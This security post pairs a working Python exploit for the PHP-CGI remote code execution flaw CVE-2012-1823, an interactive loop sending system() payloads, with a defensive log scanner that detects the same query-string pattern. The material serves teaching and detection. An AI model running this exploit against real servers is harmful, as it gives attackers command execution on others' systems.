This Proof of Concept (PoC) script exploits CVE-2012-1823 – the PHP-CGI Remote Code Execution (RCE) vulnerability. It simply wraps an HTTP POST request in an endless loop that reads a command from the user on each iteration and sends it to the target as the command to run. The syntax demonstrated in this PoC script can be leveraged for other use cases because it shows how to build HTTP requests in Python with custom HTTP headers.

```python
#!/usr/bin/python
import sys, urllib2    # Import the required modules for the script (Python 2: urllib2, raw_input, print statement)

if len(sys.argv) != 2:    # Checks to make sure that a URL was supplied as a sys argument "<script> <URL>"
  print "Usage: "+sys.argv[0]+" <URL>"
  sys.exit(0)

URL=sys.argv[1]        # Assigns URL variable and prints out message
print "[+] Attempting CVE-2012-1823 - PHP-CGI RCE"

while True:        # Endless loop printing out a "~$ " and getting user input via "raw_input" to the command variable
  command=raw_input("~$ ")
  Host = URL.split('/')[2]      # Parse host from URL: 'http://<host>/' will parse out <host>
  headers = {                   # Set the appropriate headers for the request
    'Host': Host,
    'User-Agent': 'Mozilla',
    'Connection': 'keep-alive'}
  data = "<?php system('"+command+"');die(); ?>"        # PHP to run on the server (sent as the POST body)
  # Query string with no literal '=' so php-cgi treats it as command-line options ('%3d' keeps '=' out of the raw string)
  req = urllib2.Request(URL+"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data, headers)

  try:                    # Sets up a Try/Except block so exceptions are handled cleanly
    response = urllib2.urlopen(req)     # Actually makes the request
    for line in response.readlines():
      print line.strip()
  except Exception as e:  # 'except' must align with 'try'; the original indentation was a syntax error
    print e
```
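The request pattern above is also what a defender looks for in web-server logs: a query string that contains no literal `=` and decodes to php-cgi option words such as `-d` or `-s`. The following Python 3 scanner is an added example, not part of the original post; it uses constructed Apache-style access-log lines, and the set of php-cgi option flags it checks for is an assumption based on php-cgi's documented options rather than anything in the PoC.

```python
#!/usr/bin/env python3
"""Added example: flag CVE-2012-1823 style PHP-CGI argument injection in
access-log lines. Not part of the original PoC."""
import re
from urllib.parse import unquote, unquote_plus

# php-cgi command-line options that can be smuggled through the query string.
# Assumed set taken from php-cgi's documented options (-d sets an ini directive,
# -s dumps the script source, -n skips php.ini); not from the original post.
PHP_CGI_OPTIONS = {"-d", "-s", "-n", "-c", "-i", "-h", "-T"}

# Constructed sample log lines (Apache combined format); none are real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "Mozilla"
203.0.113.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?-s HTTP/1.1" 200 2048 "-" "Mozilla"
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=home&id=-5 HTTP/1.1" 200 1024 "-" "Mozilla"
198.51.100.8 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?%2dd+disable_functions%3d HTTP/1.1" 200 300 "-" "curl"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def query_is_cgi_args(query):
    """True if a raw query string would be handed to php-cgi as argv.

    The web server only passes the query as command-line words when it holds
    no literal '=' (the %3d encoding in the PoC keeps '=' out of the raw
    string). The '+'-separated words are decoded individually, so a
    percent-encoded dash such as %2dd is still recognised as -d.
    """
    if not query or "=" in query:
        return False
    words = [unquote(w) for w in query.split("+")]
    return any(w.startswith("-") and w[:2] in PHP_CGI_OPTIONS for w in words)


def scan_access_log(text):
    """Return (line_number, client_ip, decoded_query) for each suspicious request."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        if query_is_cgi_args(query):
            ip = line.split(" ", 1)[0]
            hits.append((n, ip, unquote_plus(query)))
    return hits


if __name__ == "__main__":
    for n, ip, q in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {q}")
```

Line 3 of the sample is a legitimate request whose value merely starts with a dash; it is not flagged because the literal `=` means the server passes the query as `QUERY_STRING` rather than as arguments. The patched PHP releases (5.3.12 and 5.4.2) apply the same "no `=` in the query" distinction, so the check here mirrors the condition that made the bug reachable.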

Example Usage and Output: (screenshot of a php_cgi session, not reproduced here)